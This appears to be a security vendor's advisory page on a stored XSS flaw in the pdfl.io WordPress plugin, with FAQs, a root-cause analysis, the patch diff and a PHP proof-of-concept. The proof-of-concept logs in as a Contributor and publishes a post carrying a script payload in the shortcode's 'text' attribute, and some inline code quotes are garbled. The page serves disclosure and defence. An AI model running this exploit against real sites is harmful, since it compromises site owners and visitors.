What is CVE-2026-4073?

CVE-2026-4073 is a Stored Cross-Site Scripting (XSS) vulnerability found in the pdfl.io WordPress plugin, affecting versions up to and including 1.0.5. It allows authenticated users with Contributor-level access or higher to inject malicious scripts via the ‘text’ attribute of the ‘pdflio’ shortcode.

How does this vulnerability work?

The vulnerability arises from insufficient input sanitization and output escaping in the output_shortcode() function. The user-supplied ‘text’ variable is directly concatenated into HTML output without proper escaping, allowing attackers to inject arbitrary JavaScript that executes in the context of any user viewing the affected page.

Who is affected by CVE-2026-4073?

Any WordPress site using the pdfl.io plugin version 1.0.5 or earlier is affected. Specifically, users with Contributor-level access or higher can exploit this vulnerability, potentially impacting all users who view the affected pages.

How can I check if my site is vulnerable?

To check if your site is vulnerable, verify the version of the pdfl.io plugin installed. If it is version 1.0.5 or earlier, your site is susceptible to this vulnerability. Additionally, review the shortcode usage on your pages for any unescaped user input.

How can I fix CVE-2026-4073?

The vulnerability is fixed in version 1.0.6 of the pdfl.io plugin. To mitigate the issue, update the plugin to the latest version as soon as possible. Ensure to test your site after the update to confirm that functionality remains intact.

What does the CVSS score of 6.4 indicate?

A CVSS score of 6.4 indicates a medium severity level, suggesting that while the vulnerability is not critical, it poses a significant risk. Attackers with low-level access can exploit this flaw, potentially leading to more severe consequences if exploited.

What are the practical risks associated with this vulnerability?

The practical risks include session hijacking, credential theft, and the ability to deface pages or distribute malware. Since the XSS is stored in the database, it can affect all users who access the compromised content, including site administrators.

What is a proof of concept (PoC) in this context?

The proof of concept provided demonstrates how an attacker can exploit the vulnerability by creating a malicious shortcode. It outlines the steps to authenticate as a Contributor user and inject a script that executes when other users view the affected page.

What steps can I take to mitigate risks if I cannot update immediately?

If immediate updating is not possible, consider disabling the pdfl.io plugin until a patch can be applied. Additionally, review user roles and permissions to limit access to only trusted users, reducing the risk of exploitation.

How does this vulnerability compare to other XSS vulnerabilities?

CVE-2026-4073 is a Stored XSS vulnerability, which is generally more dangerous than reflected XSS because the payload is saved on the server and can affect multiple users over time. This persistent nature increases the potential impact and complexity of the attack.

What should I do if I suspect my site has been compromised?

If you suspect your site has been compromised, immediately change passwords for all user accounts, particularly those with administrative access. Conduct a thorough security audit, check for unauthorized changes, and consider restoring from a clean backup if necessary.

Where can I find more information about this vulnerability?

More information about CVE-2026-4073 can be found on the National Vulnerability Database (NVD) and security advisories from WordPress security resources. Keeping abreast of plugin updates and security announcements is crucial for maintaining site security.

Atomic Edge Proof of Concept automated generator using AI diff analysis

Published : May 4, 2026

CVE-2026-4073: pdfl.io <= 1.0.5 – Authenticated (Contributor+) Stored Cross-Site Scripting via 'text' Shortcode Attribute (pdfl-io)

CVE ID CVE-2026-4073

Plugin pdfl-io

Severity Medium (CVSS 6.4)

CWE 79

Vulnerable Version 1.0.5

Patched Version 1.0.6

Disclosed April 6, 2026

Analysis Overview

Atomic Edge analysis of CVE-2026-4073:

This vulnerability is a Stored Cross-Site Scripting (XSS) flaw in the pdfl.io WordPress plugin, affecting versions up to and including 1.0.5. The ‘text’ attribute of the ‘pdflio’ shortcode lacks output escaping, allowing authenticated users with Contributor-level access or higher to inject persistent JavaScript payloads into page content.

The root cause is in the output_shortcode() function within pdflio.php (line 102-119 in the diff). The function retrieves a ‘text’ parameter from the shortcode attributes array and directly concatenates it into the HTML anchor tag on the return statement: ‘return ‘‘ . $text . ‘‘;’. The $text variable is not passed through esc_html() or any other escaping function before being placed in the HTML context. This omission means any attacker-supplied value in the shortcode’s ‘text’ attribute is rendered as raw HTML.

To exploit this, an attacker with Contributor-level (or higher) WordPress account creates or edits a post/page and inserts the vulnerable shortcode with a malicious payload in the ‘text’ attribute. For example: [pdflio url=”https://example.com” text=”alert(‘XSS’)”]. When the page is saved and viewed by any user (including administrators), the JavaScript executes in their browser context. No additional authentication is required beyond the initial post creation privileges.

The patch applies esc_html() to the $text variable in the return statement: ‘return ‘‘ . esc_html( $text ) . ‘‘;’. This encodes special HTML characters (e.g., , &, “, ‘) into their HTML entity equivalents, preventing script injection. The patch also adds sanitize_text_field() and urlencode() calls to other shortcode attributes (format, delay, etc.) that were previously unsanitized, preventing XSS in those secondary vectors as well.

An attacker can inject arbitrary JavaScript that executes in the context of any user viewing the affected page. This leads to session hijacking, credential theft, defacement, or propagation of malware. Since the XSS is stored in the database and rendered on every page load, it can affect site visitors, editors, and administrators, potentially leading to full site compromise if administrative credentials are stolen.

Differential between vulnerable and patched code

Below is a differential between the unpatched vulnerable code and the patched update, for reference.

Code Diff

--- a/pdfl-io/pdflio.php
+++ b/pdfl-io/pdflio.php
@@ -2,15 +2,15 @@
 /*
 Plugin Name: pdfl.io
 Description: Get PDFs from pdfl.io
-Version:     1.0.5
-Author:      tripleNERDscre
-Author URI:  https://triplenerdscore.net
+Version:     1.0.6
+Author:      Doug Black
+Author URI:  https://pdfl.io
 Text Domain: pdflio
 */

 // No direct access.
 defined( 'ABSPATH' ) or die;
-define( 'PDFLIO_VER', '1.0.0' );
+define( 'PDFLIO_VER', '1.0.6' );
 define( 'PDFLIO_CACHE_PATH', __DIR__ . '/cache'  );

 if ( ! class_exists( 'PDFLIO_Main' ) ) {
@@ -102,19 +102,19 @@

 			$fields = array(
 				'url'      => 'url=' . urlencode( $url ),
-				'filename' => 'filename=' . $filename,
+				'filename' => 'filename=' . urlencode( sanitize_file_name( $filename ) ),
 			);

-			if ( $format != '' )             array_push( $fields, 'format=' . $format );
-			if ( $no_background != '' )      array_push( $fields, 'no_background=' . $no_background );
-			if ( $greyscale != '' )          array_push( $fields, 'greyscale=' . $greyscale );
-			if ( $top_view_only != '' )      array_push( $fields, 'top_view_only=' . $top_view_only );
-			if ( $disable_javascript != '' ) array_push( $fields, 'disable_javascript=' . $disable_javascript );
-			if ( $disable_images != '' )     array_push( $fields, 'disable_images=' . $disable_images );
-			if ( $just_wait != '' )          array_push( $fields, 'just_wait=' . $just_wait );
-			if ( $delay != '' )              array_push( $fields, 'delay=' . $delay  );
+			if ( $format != '' )             array_push( $fields, 'format=' . urlencode( sanitize_text_field( $format ) ) );
+			if ( $no_background != '' )      array_push( $fields, 'no_background=' . urlencode( sanitize_text_field( $no_background ) ) );
+			if ( $greyscale != '' )          array_push( $fields, 'greyscale=' . urlencode( sanitize_text_field( $greyscale ) ) );
+			if ( $top_view_only != '' )      array_push( $fields, 'top_view_only=' . urlencode( sanitize_text_field( $top_view_only ) ) );
+			if ( $disable_javascript != '' ) array_push( $fields, 'disable_javascript=' . urlencode( sanitize_text_field( $disable_javascript ) ) );
+			if ( $disable_images != '' )     array_push( $fields, 'disable_images=' . urlencode( sanitize_text_field( $disable_images ) ) );
+			if ( $just_wait != '' )          array_push( $fields, 'just_wait=' . urlencode( sanitize_text_field( $just_wait ) ) );
+			if ( $delay != '' )              array_push( $fields, 'delay=' . urlencode( sanitize_text_field( $delay ) ) );

-			return '<a href="' . admin_url( 'admin-post.php?action=pdflio_process&' . implode( '&', $fields ) ) . '">' . $text . '</a>';
+			return '<a href="' . esc_url( admin_url( 'admin-post.php?action=pdflio_process&' . implode( '&', $fields ) ) ) . '">' . esc_html( $text ) . '</a>';
 		}

 		public function process_request() {
--- a/pdfl-io/trunk/pdflio.php
+++ b/pdfl-io/trunk/pdflio.php
@@ -2,15 +2,15 @@
 /*
 Plugin Name: pdfl.io
 Description: Get PDFs from pdfl.io
-Version:     1.0.5
-Author:      tripleNERDscre
-Author URI:  https://triplenerdscore.net
+Version:     1.0.6
+Author:      Doug Black
+Author URI:  https://pdfl.io
 Text Domain: pdflio
 */

 // No direct access.
 defined( 'ABSPATH' ) or die;
-define( 'PDFLIO_VER', '1.0.0' );
+define( 'PDFLIO_VER', '1.0.6' );
 define( 'PDFLIO_CACHE_PATH', __DIR__ . '/cache'  );

 if ( ! class_exists( 'PDFLIO_Main' ) ) {
@@ -102,19 +102,19 @@

 			$fields = array(
 				'url'      => 'url=' . urlencode( $url ),
-				'filename' => 'filename=' . $filename,
+				'filename' => 'filename=' . urlencode( sanitize_file_name( $filename ) ),
 			);

-			if ( $format != '' )             array_push( $fields, 'format=' . $format );
-			if ( $no_background != '' )      array_push( $fields, 'no_background=' . $no_background );
-			if ( $greyscale != '' )          array_push( $fields, 'greyscale=' . $greyscale );
-			if ( $top_view_only != '' )      array_push( $fields, 'top_view_only=' . $top_view_only );
-			if ( $disable_javascript != '' ) array_push( $fields, 'disable_javascript=' . $disable_javascript );
-			if ( $disable_images != '' )     array_push( $fields, 'disable_images=' . $disable_images );
-			if ( $just_wait != '' )          array_push( $fields, 'just_wait=' . $just_wait );
-			if ( $delay != '' )              array_push( $fields, 'delay=' . $delay  );
+			if ( $format != '' )             array_push( $fields, 'format=' . urlencode( sanitize_text_field( $format ) ) );
+			if ( $no_background != '' )      array_push( $fields, 'no_background=' . urlencode( sanitize_text_field( $no_background ) ) );
+			if ( $greyscale != '' )          array_push( $fields, 'greyscale=' . urlencode( sanitize_text_field( $greyscale ) ) );
+			if ( $top_view_only != '' )      array_push( $fields, 'top_view_only=' . urlencode( sanitize_text_field( $top_view_only ) ) );
+			if ( $disable_javascript != '' ) array_push( $fields, 'disable_javascript=' . urlencode( sanitize_text_field( $disable_javascript ) ) );
+			if ( $disable_images != '' )     array_push( $fields, 'disable_images=' . urlencode( sanitize_text_field( $disable_images ) ) );
+			if ( $just_wait != '' )          array_push( $fields, 'just_wait=' . urlencode( sanitize_text_field( $just_wait ) ) );
+			if ( $delay != '' )              array_push( $fields, 'delay=' . urlencode( sanitize_text_field( $delay ) ) );

-			return '<a href="' . admin_url( 'admin-post.php?action=pdflio_process&' . implode( '&', $fields ) ) . '">' . $text . '</a>';
+			return '<a href="' . esc_url( admin_url( 'admin-post.php?action=pdflio_process&' . implode( '&', $fields ) ) ) . '">' . esc_html( $text ) . '</a>';
 		}

 		public function process_request() {

Proof of Concept (PHP)

NOTICE :

This proof-of-concept is provided for educational and authorized security research purposes only.

You may not use this code against any system, application, or network without explicit prior authorization from the system owner.

Unauthorized access, testing, or interference with systems may violate applicable laws and regulations in your jurisdiction.

This code is intended solely to illustrate the nature of a publicly disclosed vulnerability in a controlled environment and may be incomplete, unsafe, or unsuitable for real-world use.

By accessing or using this information, you acknowledge that you are solely responsible for your actions and compliance with applicable laws.

PHP PoC

// ==========================================================================
// Atomic Edge CVE Research | https://atomicedge.io
// Copyright (c) Atomic Edge. All rights reserved.
//
// LEGAL DISCLAIMER:
// This proof-of-concept is provided for authorized security testing and
// educational purposes only. Use of this code against systems without
// explicit written permission from the system owner is prohibited and may
// violate applicable laws including the Computer Fraud and Abuse Act (USA),
// Criminal Code s.342.1 (Canada), and the EU NIS2 Directive / national
// computer misuse statutes. This code is provided "AS IS" without warranty
// of any kind. Atomic Edge and its authors accept no liability for misuse,
// damages, or legal consequences arising from the use of this code. You are
// solely responsible for ensuring compliance with all applicable laws in
// your jurisdiction before use.
// ==========================================================================
<?php
// Atomic Edge CVE Research - Proof of Concept
// CVE-2026-4073 - pdfl.io <= 1.0.5 - Authenticated (Contributor+) Stored Cross-Site Scripting via 'text' Shortcode Attribute

// Configuration: Set these variables before running
$target_url = 'http://example.com';  // Replace with the target WordPress site URL
$username   = 'contributor_user';     // Replace with a valid WordPress username (Contributor+)
$password   = 'user_password';        // Replace with the user's password

// Step 1: Authenticate and get session cookies
$login_url = $target_url . '/wp-login.php';
$ch = curl_init($login_url);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_HEADER, true);
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_POSTFIELDS, 'log=' . urlencode($username) . '&pwd=' . urlencode($password) . '&wp-submit=Log+In&redirect_to=' . urlencode($target_url . '/wp-admin/') . '&testcookie=1');
curl_setopt($ch, CURLOPT_COOKIEJAR, '/tmp/cookies.txt');
curl_setopt($ch, CURLOPT_COOKIEFILE, '/tmp/cookies.txt');
$response = curl_exec($ch);
if (curl_getinfo($ch, CURLINFO_HTTP_CODE) !== 302) {
    die('Authentication failed. Check credentials.');
}

// Step 2: Get the REST API nonce and create a new post with malicious shortcode
$rest_url = $target_url . '/wp-json/wp/v2/posts';
$payload = '<script>alert(document.cookie)</script>';
$post_data = array(
    'title'   => 'CVE-2026-4073 Test Post',
    'content' => '[pdflio url="https://example.com" text="' . $payload . '"]',
    'status'  => 'publish'
);

$headers = array(
    'Content-Type: application/json',
    'X-WP-Nonce: ' . get_nonce($target_url, '/tmp/cookies.txt')
);

curl_setopt($ch, CURLOPT_URL, $rest_url);
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_POSTFIELDS, json_encode($post_data));
curl_setopt($ch, CURLOPT_HTTPHEADER, $headers);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_HEADER, false);
$response = curl_exec($ch);
$http_code = curl_getinfo($ch, CURLINFO_HTTP_CODE);
curl_close($ch);

if ($http_code === 201) {
    $result = json_decode($response, true);
    echo 'Post created successfully. Visit: ' . $result['link'] . PHP_EOL;
    echo 'The stored XSS payload "' . $payload . '" will execute on page load.' . PHP_EOL;
} else {
    echo 'Failed to create post. HTTP code: ' . $http_code . PHP_EOL;
    echo 'Response: ' . $response . PHP_EOL;
}

function get_nonce($base_url, $cookie_file) {
    $ch = curl_init($base_url . '/wp-admin/admin-ajax.php?action=rest-nonce');
    curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
    curl_setopt($ch, CURLOPT_COOKIEFILE, $cookie_file);
    $nonce = curl_exec($ch);
    curl_close($ch);
    return trim($nonce);
}

Frequently Asked Questions

What is CVE-2026-4073?
Overview of the vulnerability
CVE-2026-4073 is a Stored Cross-Site Scripting (XSS) vulnerability found in the pdfl.io WordPress plugin, affecting versions up to and including 1.0.5. It allows authenticated users with Contributor-level access or higher to inject malicious scripts via the ‘text’ attribute of the ‘pdflio’ shortcode.
How does this vulnerability work?
Mechanism of the attack
The vulnerability arises from insufficient input sanitization and output escaping in the output_shortcode() function. The user-supplied ‘text’ variable is directly concatenated into HTML output without proper escaping, allowing attackers to inject arbitrary JavaScript that executes in the context of any user viewing the affected page.
Who is affected by CVE-2026-4073?
Identifying impacted users
Any WordPress site using the pdfl.io plugin version 1.0.5 or earlier is affected. Specifically, users with Contributor-level access or higher can exploit this vulnerability, potentially impacting all users who view the affected pages.
How can I check if my site is vulnerable?
Steps for vulnerability assessment
To check if your site is vulnerable, verify the version of the pdfl.io plugin installed. If it is version 1.0.5 or earlier, your site is susceptible to this vulnerability. Additionally, review the shortcode usage on your pages for any unescaped user input.
How can I fix CVE-2026-4073?
Updating the plugin
The vulnerability is fixed in version 1.0.6 of the pdfl.io plugin. To mitigate the issue, update the plugin to the latest version as soon as possible. Ensure to test your site after the update to confirm that functionality remains intact.
What does the CVSS score of 6.4 indicate?
Understanding the severity rating
A CVSS score of 6.4 indicates a medium severity level, suggesting that while the vulnerability is not critical, it poses a significant risk. Attackers with low-level access can exploit this flaw, potentially leading to more severe consequences if exploited.
What are the practical risks associated with this vulnerability?
Potential impacts on your site
The practical risks include session hijacking, credential theft, and the ability to deface pages or distribute malware. Since the XSS is stored in the database, it can affect all users who access the compromised content, including site administrators.
What is a proof of concept (PoC) in this context?
Demonstrating the vulnerability
The proof of concept provided demonstrates how an attacker can exploit the vulnerability by creating a malicious shortcode. It outlines the steps to authenticate as a Contributor user and inject a script that executes when other users view the affected page.
What steps can I take to mitigate risks if I cannot update immediately?
Temporary risk management strategies
If immediate updating is not possible, consider disabling the pdfl.io plugin until a patch can be applied. Additionally, review user roles and permissions to limit access to only trusted users, reducing the risk of exploitation.
How does this vulnerability compare to other XSS vulnerabilities?
Contextualizing the risk
CVE-2026-4073 is a Stored XSS vulnerability, which is generally more dangerous than reflected XSS because the payload is saved on the server and can affect multiple users over time. This persistent nature increases the potential impact and complexity of the attack.
What should I do if I suspect my site has been compromised?
Response actions for security incidents
If you suspect your site has been compromised, immediately change passwords for all user accounts, particularly those with administrative access. Conduct a thorough security audit, check for unauthorized changes, and consider restoring from a clean backup if necessary.
Where can I find more information about this vulnerability?
Resources for further reading
More information about CVE-2026-4073 can be found on the National Vulnerability Database (NVD) and security advisories from WordPress security resources. Keeping abreast of plugin updates and security announcements is crucial for maintaining site security.

How Atomic Edge Works

Simple Setup. Powerful Security.

Atomic Edge acts as a security layer between your website & the internet. Our AI inspection and analysis engine auto blocks threats before traditional firewall services can inspect, research and build archaic regex filters.

Get Started

Trusted by Developers & Organizations